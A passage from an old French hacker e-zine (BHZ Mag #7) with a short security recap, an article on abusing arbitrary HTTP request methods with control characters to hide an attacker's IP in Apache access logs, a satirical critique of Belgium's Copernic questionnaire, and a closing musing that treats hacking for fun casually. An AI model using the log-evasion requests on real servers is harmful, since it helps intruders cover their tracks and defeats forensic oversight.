Si on reprend tout depuis le debut : il existe deux differents types d'attaques, il vous faut accorder les bonnes autorisations aux fichiers avec la commande chattr, il est conseille d'utiliser la cryptographielors des connections de donnees, il vous faut securiser vos sessions aves Secure Shell et vos mails avec PGP, vous abonner à des listes de diffusion concernant la securite de votre systeme ou visiter regulierement des sites qui en parlent.

_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________


********************************
* les requests des scripts CGI *
********************************

Auteur : wHyAnGeL
Date : 04.08.00
Titre : Les request des scripts CGI.
Les request sont des demandes faites par la machine cliente. Cet article démontre quelques exploits en raport avec les CGI.

C'est une caractéristique inhérente propre à quelques serveurs web, tel que Apache 1.3.x ou Microsoft IIS.

Ces légers transports d'implications de sécurité autoriseraient des attaques invisibles, donc intraçables aux serveurs web.
Le problème associé aux "allowable" REQUEST_METHODs (les méthodes de demandes autorisées) quand une ressource dynamique, tel qu'un script CGI est demandé. Essentiellement toutes les méthodes de demandes (excepté HEAD, TRACE et OPTIONS) peuvent être utilisées, même les méthodes non définies dans le protocole HTTP.

Envisagez que la demande qui suit retourne toutes les ressource demandées :

GET /cgi-bin/environ.cgi HTTP/0.9

Azx5T8uHTRuDL /cgi-bin/environ.cgi HTTP/1.0

Même le contrôle des caractères est permis, alors envisagez ceci :

^H^H^H^H^H^H^H^H^H_ENCORE_BEAUCOUP_PLUS_^H^H /cgi-bin/environ.cgi HTTP/1.1

Un attaquant (un script kiddie) pourrait émettre cette demande dans l'intention de cacher ces mouvement sur l'hôte. Quand cette demande est loggée dans l'access log et visionnée en utilisant 'cat' , et, les script visités apparaîtront sans votre IP.

# cat /var/log/httpd/access_log

ou

# more /var/log/httpd/access_log

Ces deux commandes citées ci-dessus révellent :

10.20.20.1 - - [05/Jan/1999:18:00:00 GMT] "GET / HTTP/1.0" 200 1098

/cgi-bin/environ.cgi HTTP/1.1" 200 2034

10.20.20.2 -- [05/Jan/1999:18:01:00 GMT] "GET /index.html HTTP/0.9" 200 1098

Utilise une méthode similaire, si c'est possible, pour un attaquant pour faire apparaître l'attaque comme si elle provenait d'une autre IP ou pour enlever complètement les vraies informations loggées en désignant un certain contrôle de caractère dans la QUERY_STRING aussi (la ligne de demande de restitution d'information extraite d'une banque de donnée).

Je l'ai testé sur Apache 1.3.3, sur RedHat 5.2, sur Apache 1.2.7, sur RedHat 5.0, Microsoft's Internet Information Server 2, 3 et 4, mais dans l'environement NT, ce n'est pas nécessaire, parce que l'on peut éditer le fichier log avec notepad et par là, effacer toute traces de passages.

_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________


***********************************
* La chtite pensee anarchique n°2 *
***********************************


\\\|///
-(o o)-
£___________________oOOOo__(_)__oOOOo_________________£
£µ\ «««««««« ¡ Underground Production ¡ »»»»»»» /µ£
£µµ/---------------------------------------------------\µµ£
£µµ/ [ La chtite pensée ananarchique 2 Le RETOUR ] \µµ£
£µµ\ GRIm@, L'Apprenti Sorcier Proudly Present /µµ£
£µµ\---------------------------------------------------/µµ£
£µ/LES NEWBIES D'AUJOURD'HUI SONT LES 3L33T3 DE DEMAIN\µ£
£\___________________________________________________/£


[adminn@remotehost]# m0D3 0n: G3l4p4 d0N3
[gelapa@remotehost]# M0d3 0N: wH4T d4 FuCk D0n3
[gelapa@remotehost]# k1lL 3cR1tUr3 d3 C0wB0y5... Done
[gelapa@remotehost]# launch cervaux... Done

Hé oui, me revoilà !!! Cette fois-ci zéte foutu... Aprés ce superbe
ASCII encore mieux que la fois derniére, revoici revoilà la chtite
pensée ananarchique !?!
Arf, le concept reste le même (voir BHZ mag #6), mais cette fois-ci
je vais vous parler d'un truc tout a fait sérieux (barf, mais toujours
avec humour léger et discret (vous êtes foutu, je l'ai dit)...

ADISCLAIMER
----------
Ce texte contient de vrai morceaux de connerie, s'il vous prend l'envie
d'être con, c'est votre probléme...
Ce texte est légal (pour autant que je sache, mais on sait jamais ;-) )
---------------
EOF ADISCLAIMER

Comme d'hab il est déconseillé d'utiliser des aditifs avec cet articles,
genre bon sens, intelligence, esprit critique et autres... Je vous
conseille donc de débrancher ces plugin inutile et emcombrant pour votre
esprit afin de libérer quelques cycles CPU...

<TITLE> System 2 System (or what da feucking syst3m) </TITLE>

Mais vous aller me dire de koi vas-t'on parler ? ben oui, j'ai
dit qu'on parlerai de qqchose de sérieux, mais n'ayez aucune crainte,
ca SERA TRéS ennouyeux ;-). Bref pour en venir au fait et ne pas
discourir dans le vide sans but ni echapatiore, ainsi que pour ne
pas vous faire attendre ni se dérober nous allons parler de... tadam...
(jvous l'ai dit, VOUS ETES FOUTU !!! :-)..) Le Projet Copernic !!!
Pour ceux qui savent pas ce que c'est voici un petit encart qui vous
est destiné (les autres sauté le, enfin pas littéralement si possible):
---------------------------------------------------------------------
Le Projet Copernic est encore un belgicisme risible qui fait que les
blagues sur nous marchent si bien. En effet, certain ministre dont je
ne citerai pas la nom (et encore moins le parti; PD !! HAHA kel con
ce duqenne ;-) se sont dit qu'il serait peut-être temps de dépoussierez
l'administration. Arf, tout a fait d'accord avec eux, remmetre a niveau
une administration vielle de 2 siécles il faut le faire. Mais alors
con comme il sont, il ont envoyé a presque tous les belges de plus de
16 ans un questionnaire avec des questions (non, vraiment ???). Ce
n'était ni un référendum, ni une pub, juste une double feuille avec des
questions sur le fonctionnement de l'administration que nous pensions
devoir avoir... (Note, y'a eu 7 millions de forumlaires envoyé sur
10 millions d'habitants) Bref, on continue:
---------------------------------------------------------------------
Donc ces chers ministres arc-en-ciel nous envoient leurs putains de
questionnaires qui vont couter 10 millions à l'état. Mais voilà, le
questionnaire est bourré d'incohérence, de fausses questions, ainsi
que de question pas trés claires et des truc un peux bizzare. Ayant
recu ce questionnaire, je vous file une copie des questions:
(Y'avais 2 feuilles, voici la premiére, aprés la deuxiémes:)
Note: chaque question était accompagnée de 5 case à cocher,
-tout à fait d'acord
-d'accord
-sans opinion
-pas d'accord
-pas du tout d'accord
sensée représenté l'avis général et entier de la personne sur le
sujet...
Note2: Sur la deuxiéme feuille seule la question 1 avait ce type
de réponse, j'ai noté le type de cotation pour les autres questions

----------
| | Donnez votre opinions sur les orientations du plan:
| .BE |
|Belgique|
---------- 1. Le gouvernement doit établir les lignes de force mais les
| Le Plan| fonctionnaires peuvent décider eux-mêmes pour la gestion
| | journaliére
|COPERNIC|
| | 2. Les fonctionnaires de l'administration sont désigné pour
| | période limitée (titulaires de mandat).
| |
| | 3. L'administration publique veut attirer les collaborateurs
| | les plus compétent pour ces fonctions dirigeante et doit
| | s'ouvrir au candidats tant internes que externes.
| |
|pour la| 4. Les personnes exerçant une fonction dirigeante doivent
|moderni-| être évalué en fonction de leurs résultats. Ces résultat
|sation | à atteindre sont définis au préalable
|de l' |
|admini- | 5. Les cabinets sont supprimé et remplacé par des cellules
|stration| stratégiques au sein de l'administration et par un petit
|fédérale| secrétariat personnel au service de chaque ministres
| | 6. Chaques service fédéral doit donner des garanties de
| | qualités pour la fourniture de service
|________|

----------
| | 1. Le dépliant qui accompagne ce questionnaire reprend la
| .BE | philosophie de base pour la modernisation de
|Belgique| l'administration fédérale.
---------- Dans quelle mesure êtes-vous d'accord ou non sur cette
| Le Plan|

  
proposition ? (NOTE: ce dépliant en gros explique la même
| | chose que le questionnaire 1)
|COPERNIC|
| | 2. Comment voudriez vous communiquer à l'avenir avec
| | l'administration publique ?
| | (Donnez des points de 1 à 8, 1 étant le meilleur score)
| |
| | -Lettre -par le biais de la commune
| | -téléphone -contact personnel
| | -internet à domicile -télétexte interactif
|pour la| -internet dans une bibliothéque -internet
|moderni-|
|sation | 3. A quoi attachez vous le plus d'importance dans l'attitude
|de l' | des fonctionnaires.
|admini- | (Donnez des points de 1 à 4, 1 étant le meilleur score)
|stration|
|fédérale| -convivialité -être à l'écoute des gens
| | -traitement égal pour tous -respect de la vie privée
| |
| | 4. Quelle amélioration du service publique jugez-vous
| | prioritaire ?
| | (Pour le classement vois ci-dessus)
| |
| | -rapidité du service -simplicité des procédures
| | -qualité du service -disponibilité
| |
| | 5. La promotion des fonctionnaires doit se faire sur une base
| | et dépolitisée. De quoi doit-on le plus tenir compte,
| | selon vous ?
| | (indiquez vos priorités de 1 à 3)
| |
| | -Sélection en fonction des années de service
| | -Sélection en fonction du diplôme
| | -Sélection en fonction des compétence
|________|

Bon voilà, maintenant je vais critiquer et/ou répondre à chaque questions
les unes aprés les autres...

Question 1 : Arf, ben je pense bien que je suis d'accord, comment veut-tu
que le gov puisse gérer la gestion journaliére des 20.000 agents du service
publique. Remarquez que c'est pas vraiment une question, puisqu'il n'y a
qu'une réponse possible

Question 2 : Pkoi il sont nommé à vie sinon ?

Question 3 : Ha c'est vrai que dans l'administration ont choisi toujours
les plus incompétent de ses sous-services pour diriger. Encore une question
ou on nous force la main

Question 4 : Lol, non on vas plutot les évaluer aux nombres d'heures
prestée ;-). En plus si les résultat à atteindre n'était pas fixé à
l'avance, comment voulez vous les obtenir puisque vous ne cherchez pas
à les atteindre (Encore une question forcée)

Question 5 : Heu ouais pkoi pas, c pas mal. Mais à propos, les cabinets à
l'origine, c'est pas justement des petit secrétariat personnel au service
du ministre ? ;-)

Question 6 : Ha c'est vrai que je suis pas du tout d'accord avec cette
affirmation, surtout pas me donner des garantie de qualité, ha ca non !

Remarquez que sur 6 questions, pour l'instant aucune n'en réellement une,
en effet toute sont orientée de telle sorte qu'on ne puisse répondre qu'une
seule chose (sauf si vous travailler à l'administraion évidemment ;-)
Bon maintenant passons à la feuille 2:

Question 1 : Arf, ben ouais j'suis d'accord, pkoi j'ai le chois ? ;-)

Question 2 : Ha là, ca m'a fait bondir ! Hé oui, seule 3 des 8
propositions ne sont pas payantes... Réfléchissez, le téléphone,
internet chez vous ou à la biblio ou à la poste (même les biblio font
payer maintenant), le télétexte (ben oui faut avoir une télé et un
abonnement)... Seule le contact direct, par le biais de la commune ou la
lettre ne représente qu'un cout minime pour les personne qui ont le plus
besoin des services publiques, les sans-papier, les sdf et autres.
Finalement avec toutes ces propositions ou internet apparait partout,
on empêche l'accés aux services PUBLIQUE par les personnes qui ne
possédent pas les moyen financier de se procurer ces moyens
technologique. En fait donc cette question peut amener à une violation
de l'article 2 du code pénal disant que tout les belges sont égaux !

Question 3 : Arf, déjà y'a 3 des 4 propositions qui sont obligatoire,
l'écoute (ben ouais vous leur demandre qqch il faut qu'il le fassent,
c'est avec vos impot qu'ils sot payé non ?!!), le traitement égal
pour tous (c'est la loi), et le respect de la vie privée (paske ces
connards veulent nous espionner en plus ;-). Finalement il ne reste
qu'une proposition qui, comme elle est facultative, pourrait être
améliorée, la convivialité. En gros cette question au fond demande si
on veut que les agents soit plus conviviaux ou pas... et puis quoi
encore bien sure que non !! (tss il sont bêtes ces ministres) ;-)

Question 4 : Ben tient tout les 4 bien sur, y'en a pas une de +
prioritaire, ces 4 choses devrait être fournis à la base... !!

Question 5 : Pkoi, la promotion des fonctionnaires ne se fait pas sur une
base objective maintenant ? C'est sur qu'il faut tenir compte des années
de service à ne rien faire dans le bureau pour les promotions, pff avoir
des compétence ou un diplôme ca sert à rien...

Bref, je pense que vous avez bien vous ou se tenait la fourberie de ce
questionnaire, j'éspére maintenant que le gouvernement y repensera à
deux fois avant d'envoyer des questions aussi stupide. Notez d'ailleur
que ce référendum a fait un big flop, en effet seul 20.000 personnes
sur les 7.000.000 questionnée ont répondus (tient, vingt mille, c'est pas
justement le nombre d'employé à la fonction publique ;-) ? )

Bon voilà, j'éspére que cet article a défaut d'avoir servit a remplir un
peux plus le mag vous aura un peux ouvert l'esprit et dévelopé votre sens
critique.
Souvenez vous que la dictature n'est jamais loin, et que la citoyéneté, et
la liberté ne sont pas des droits, ce sont des devoirs, à accomplir
chaque jour.


-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________

Bon voilà, BHZ Mag n°7 est termine, et je ne sais pas trop quoi mettre comme mot de la fin, en plus j'ai pas d'inspiration, je n'en suis qu'à ma deuxieme Jupiler, GRIm@ est meilleur que moi aux Echecs-VMB, j'ai ecrit que deux articles pour ce zine et les cours recommencent dans quelques jours. Et en plus j'ai renverse un peu de biere à terre à cause de Jonhatan Davis et son groupe et leur super musique que j'adore. Mais bon là je suis en train de deraper sur un sujet qui n'est pas celui sense etre aborde par ce zine, de toute facon il est inutile de preciser que KoRn est le meilleur groupe au monde, cela a ete prouve. (Et non GRIm@ ce n'est pas Queen le meilleur groupe :)) Enfin bon, cette fois-ci je ne vais pas encore sortir une de mes habituelles elucubrations sur l'etat de la scene en Belgique francophone ou en Belgique tout court, voire dans le monde. De toute fracon, personne n'en tient compte et si ca se trouve personne ne les lit, mais j'en ai rien à foutre. En somme je devrais ecrire un truc du genre "Pourquoi faisons nous ce que nous faisons ?" comme mot de la fin. Oui cela me semblerait approprie. Cela serait plus simple si la question avait ete "Pourquoi! sommes nous ce que nous sommes ?" J'y aurais repondu, parce que Vous nous avez fait comme ca, oui Vous le peuple, le monde, les humains, ah ca c'est clair que ca le fait à donf, ca donne tout de suite une petite ambiance anarchiste, mais bon, ne deconnons pas, qui aujourd'hui peut se targuer de hacker uniquement des sites pedophiles, nazis, etc... (encore faudrait il y arriver) Non, si on fait ca (du moins si moi je le fais) ce n'est pour aucune raison, juste comme ca ; pour passer le temps, parce que j'ai envie, pour faire le malin, pour m'amuser, il m'arrive quand meme quelque fois (rarement) ou c'est pour une noble cause, mais bon, le hacker-qui-hacke-des-sites-pedos-et-nazis c'est une image. Une belle image certes, mais ca reste une image. Pas la peine de disserter là dessus, mon premier "hack" (mais en etait ce vraiment un ?) c'etait envers quelqu'un que je n'aimais pas trop et qui m'avait passablement enerve (bon ok j'etais tres jeune dans le temps donc c'est excusable). Mais reprenons l'image du hacker solitaire qui se bat contre la pornographie et le nazisme, c'est quand meme un sentiment de haine, de la haine envers ce qu'il considere comme immoral. Alors à partir de là on pourrait considere que tout hack, qu'il soit "White Hat" ou "Black Hat" (je ne sais pas vous mais moi je deteste ces expressions) est base sur la HAINE, il ne faut blamer personne, c'est un sentiment purement humain que celui de haine, difficile de le renier, à moins de s'appuyer sur une puissance superieure imaginaire (Dieu, etc...) Ce sentiment est omnipresent dans nos vies et donc aussi dans le hack, Ce qui est amusant c'est que le hack ou piratage informatique est une activitee consideree comme illegale, mais dans ce cas, toute activite humaine devrait etre consideree comme illegale, seuls certains sentiments devraient subsister, l'amour l'amitie, les trucs du genre, tout le reste serait illegal. La Vie en elle meme serait, si on suit ce raisonnement, illegale, Nous sommes tous des illegaux (terme utilise pour designer les personnes residant illegalement en Belgique) Ainsi, si l'on s'entretue (ce qui risque d'arriver tres bientot) cela ne sera que pure vengeance, chacun aura toujours quelque chose à reprocher à son voisin, son frere, son pere, son meilleur ami, et là, on aura tous draoit au chaos et à l'anarchie totale, tout celà grace à la nature humaine. Cool.

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos from Google Play

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT